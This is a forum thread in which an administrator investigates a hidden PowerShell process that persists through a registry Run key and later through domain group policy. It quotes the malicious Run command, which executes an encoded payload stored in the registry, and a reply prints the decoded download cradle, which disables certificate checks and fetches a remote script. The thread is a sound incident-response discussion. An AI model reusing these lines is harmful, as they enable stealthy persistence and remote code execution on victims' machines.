Suspicious Powershell Activity RRS feed

  • Question

  • Hello,

    We've found a powershell process that recently has started launching when a user logs in, and it appears to be communicating with an outside IP address - not associated with our company at all.  I haven't been able to find the source for this besides two entries in the registry that keep reappearing.

    The registry keys are as follows:

    In HKLM/Software/Microsoft/Windows/CurrentVersion/Run:

    PowerShellAD - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc $x"

    In HKLM/Software/Microsoft/Windows/CurrentVersion:


    Below is a screenshot of the processes that start when logging in:

    Powershell processes

    For the time being, we've put in place a rule to prevent Powershell from running, but we need help finding the source of this and removing it.

    So far, virus scans and root-kit scans are not finding anything, but we're also preventing this from running so it may not find anything.

    Any help would be appreciated.

    Thank you,


    lundi 25 juillet 2016 15:03

Toutes les réponses

  • after decoding and decompressing the encoded string, one gets to a commmand which downloads a further script:

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    (New-Object Net.WebClient).DownloadString('')

    the resulting script seems to be based on PowerSploit

    lundi 25 juillet 2016 19:53
  • OK.  That makes sense since the inital tasks that are started have the web address string in the command line within Task Manager.

    Any idea where this may be downloading the scripts, or where I need to search next for possible infection?



    lundi 25 juillet 2016 19:57
  • what do you mean "where this may be downloading the scripts"?
    It is run via the registry key you found, which you should delete.
    It is downloading from the ip address
    The original vector/dropper might have been via browser or email.

    I for myself would nuke from orbit ( = reinstall Windows), but you could contact someone at

    lundi 25 juillet 2016 20:58
  • Unfortunately, when I delete this reg key from my PC, it gets reapplied within a few hours.  I need to find the source PC first before I nuke anything.

    I'll post at to see if they can help with how to track down the source (and hopefully prevent more!)

    Thanks for the help.


    mardi 26 juillet 2016 11:21
  • We are looking forward to your good news:)

    Please mark the reply as an answer if you find it is helpful.

    If you have feedback for TechNet Support, contact

    mercredi 27 juillet 2016 09:44
  • So mystery is somewhat solved.  I traced it down to a powershell command that was placed in our default domain group policy.  I removed this entry and it seems to be slowing removing itself from the network.  

    The next thing to figure out now is where this came from.  There are only three people at our company with the domain password and none of us put that there.  

    The task that was running in the group policy, said it was created by domain\administrator so we are a bit perplexed over this one.  Any ideas on how to trace this part of it?




    vendredi 5 août 2016 19:53